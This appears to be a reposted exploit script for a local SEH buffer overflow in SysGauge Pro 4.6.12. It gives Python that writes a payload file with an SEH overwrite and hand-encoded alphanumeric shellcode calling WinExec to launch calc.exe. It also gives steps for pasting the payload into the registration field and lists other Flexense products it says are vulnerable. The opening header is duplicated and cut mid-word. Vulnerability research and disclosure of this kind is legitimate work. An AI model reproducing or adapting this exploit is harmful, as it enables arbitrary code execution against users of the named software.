#!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buff #!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #
# Tested on : Windows XP Professional - SP3 #
# Steps to reproduce : ~ Copy content of payload.txt #
# ~ Under Register type in "falafel" in Customer Name field #
# ~ Paste the content of payload.txt in Unlock Key field and click Register #
##################################################################################################################
import struct
# ***notes***
# ~ this particular function [Register] of the program only accept characters [00-7f] excluding "x00x09x0ax0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address
# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
# ~ SysGauge Ultimate v4.6.12
# ~ Azure DEX Pro v2.2.16
# ~ Azure DEX Ultimate v2.2.16
# ~ DiskBoss Pro v9.1.16
# ~ DiskBoss Ultimate v9.1.16
# ~ SyncBreeze Pro v10.7.14
# ~ SyncBreeze Ultimate v10.7.14
# ~ DiskPulse Pro v10.7.14
# ~ DiskPulse Ultimate v10.7.14
# ~ DiskSavvy Pro v10.7.14
# ~ DiskSavvy Ultimate v10.7.14
# ~ DiskSorter Pro v10.7.14
# ~ DiskSorter Ultimate v10.7.14
# ~ DupScout Pro v10.7.14
# ~ DupScout Ultimate v10.7.14
# ~ VX Search Pro v10.7.14
# ~ VX Search Ultimate v10.7.14
##################################################################################################################
# overwrite SEH with clean address of [pop, pop, ret]
buffer = "x41" * 780 # junk to nSEH
buffer += "x74x06x42x42" # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16) # SEH (pop esi # pop ecx # retn | [libdgg.dll])
buffer += "x43" * 28 # some more junk
# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0: 33 c0 xor eax,eax # zero out eax register
# 2: 50 push eax # push eax (null-byte) to terminate "calc.exe"
# 3: 68 2E 65 78 65 push ".exe" # push the ASCII string to the stack
# 8: 68 63 61 6C 63 push "calc" #
# d: 8b c4 mov eax,esp # put the pointer to the ASCII string in eax
# f: 6a 01 push 0x1 # push uCmdShow parameter to the stack
# 11: 50 push eax # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c mov ebx,0x7c862b5d # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3 call ebx # call WinExec()
# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "x33xc0x50x68"
# "x2ex65x78x65"
# "x68x63x61x6C"
# "x63x8bxc4x6a"
# "x01x50xbbx5d"
# "x2bx86x7cxff"
# "xd3x90x90x90"
# starting from the bottom up in little endian order
# first push "x90x90x90xd3"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "x90x90x90xd3" into eax and push it to the stack
buffer += "x05x72x70x70x70" ### add eax,0x70707072
buffer += "x05x61x20x20x20" ### add eax,0x20202061
buffer += "x50" ### push eax
##############################################################
# second push "xffx7cx86x2b"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "xffx7cx86x2b" into eax and push it to the stack
buffer += "x05x01x32x35x66" ### add eax,0x66353201
buffer += "x05x15x32x35x66" ### add eax,0x66353215
buffer += "x05x15x22x12x33" ### add eax,0x33122215
buffer += "x50" ### push eax
##############################################################
# third push "x5dxbbx50x01"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "x5dxbbx50x01" into eax and push it to the stack
buffer += "x05x01x30x65x36" ### add eax,0x36653001
buffer += "x05x01x20x56x27" ### add eax,0x27562001
buffer += "x48" ### dec eax
buffer += "x50" ### push eax
##############################################################
# fourth push "x6axc4x8bx63"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "x6axc4x8bx63" into eax and push it to the stack
buffer += "x05x32x46x70x35" ### add eax,0x35544632
buffer += "x05x31x43x70x35" ### add eax,0x35704531
buffer += "x50" ### push eax
##############################################################
# fifth push "x6cx61x63x68"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "x6cx61x63x68" into eax and push it to the stack
buffer += "x05x34x32x31x36" ### add eax,0x36313234
buffer += "x05x34x31x30x36" ### add eax,0x36303134
buffer += "x50" ### push eax
##############################################################
# sixth push "x65x78x65x2e"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "x65x78x65x2e" into eax and push it to the stack
buffer += "x05x17x33x34x33" ### add eax,0x33343317
buffer += "x05x17x32x44x32" ### add eax,0x32443217
buffer += "x50" ### push eax
##############################################################
# seventh push "x68x50xc0x33"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "x68x50xc0x33" into eax and push it to the stack
buffer += "x05x22x60x30x34" ### add eax,0x34306022
buffer += "x05x11x60x20x34" ### add eax,0x34206011
buffer += "x50" ### push eax
##############################################################
# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101
# move "x90x90x90x90" into eax and push it to the stack
buffer += "x05x70x70x70x70" ### add eax,0x70707070
buffer += "x05x20x20x20x20" ### add eax,0x20202020
buffer += "x50" ### push eax
buffer += "x50" ### push eax
buffer += "x50" ### push eax
buffer += "x50" ### push eax
buffer += "x50" ### push eax
##############################################################
# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "xffxe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:Program FilesSysGauge ProinQtCore4.dll)
# 0: 25 10 10 10 10 and eax,0x10101010
# 5: 25 01 01 01 01 and eax,0x1010101
# a: 05 31 70 03 34 add eax,0x34037031
# f: 05 22 70 06 33 add eax,0x33067022
# 14: 50 push eax
buffer += "x25x10x10x10x10x25x01x01x01x01x05x31x70x03x34x05x22x70x06x33x50"
# the program converts "xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "xff"
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1) ### junk
try:
f=open("payload.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
SysGauge Pro 4.6.12 Local Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 357